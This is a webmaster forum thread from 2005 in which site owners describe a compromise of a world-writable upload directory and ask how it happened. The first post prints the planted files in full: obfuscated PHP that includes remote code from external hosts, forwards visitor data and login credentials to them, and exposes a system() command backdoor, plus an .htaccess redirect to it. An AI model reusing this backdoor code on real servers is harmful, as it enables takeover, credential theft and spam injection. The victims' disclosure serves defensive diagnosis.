1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 3:46 am May 2, 2026

Forum Moderators: coopster

Message Too Old, No Replies

777 directory and hacking attempt

some files created - hacking attempt

         

dolcevita

12:48 pm on Dec 25, 2005 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Do not know of this is right thread(movderator move it if it is needed) but i notified a couple days a go some files in 777 directory created on same time:
report.php 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a). ".".base64_encode($b).".".base64_encode($c). ".".base64_encode($d).".".base64_encode($e). ".".base64_encode($f).".".base64_encode($g). ".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw=="). base64_decode("dXNlcjkubXNodG1sLnJ1") ."/?".$str))){} else {include(base64_decode("aHR0cDovLw=="). base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}?>

include.php: 


<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
 if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
 else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
 if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
 if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

and .htaccess (this file is there only if in 777 directory .htaccess not exist.It seems if exist .htaccess chmod to 644 they couldn make new file) 


Options -MultiViews
ErrorDocument 404 //avatars/report.php

I use actually on the site almost all static files .shtml and phpBB with last update.
Nothing else has been modified and created in any other directory.
I did inspected all.
I did a search on msn.com with search qurey


error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])? $_SERVER["HTTP_HOST"]

and got some site's where people described same problem but nobody knows how files comes there and what is actually vulnerable.Via script, via server, via insecure version of php...
Anybody know more.

Thanks

[edited by: ergophobe at 7:08 pm (utc) on Dec. 25, 2005]
[edit reason] fixed sidescroll [/edit]

bboyce

3:43 am on Dec 30, 2005 (gmt 0)

10+ Year Member



I got nailed by this too.. since I only work on our company site on the side I didn't even notice these files were on our server for a couple of months. By then Google had banned us completely and every other engine had thousands of links to www.oursite.com/images/insert-random-porn-or-warez-term-here.html

Don't have a clue what it is but my image directory was CHMOD'd 777 too. They have really hurt our traffic (and about 50% of our business comes as a direct result of our website).

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 3:46 am May 2, 2026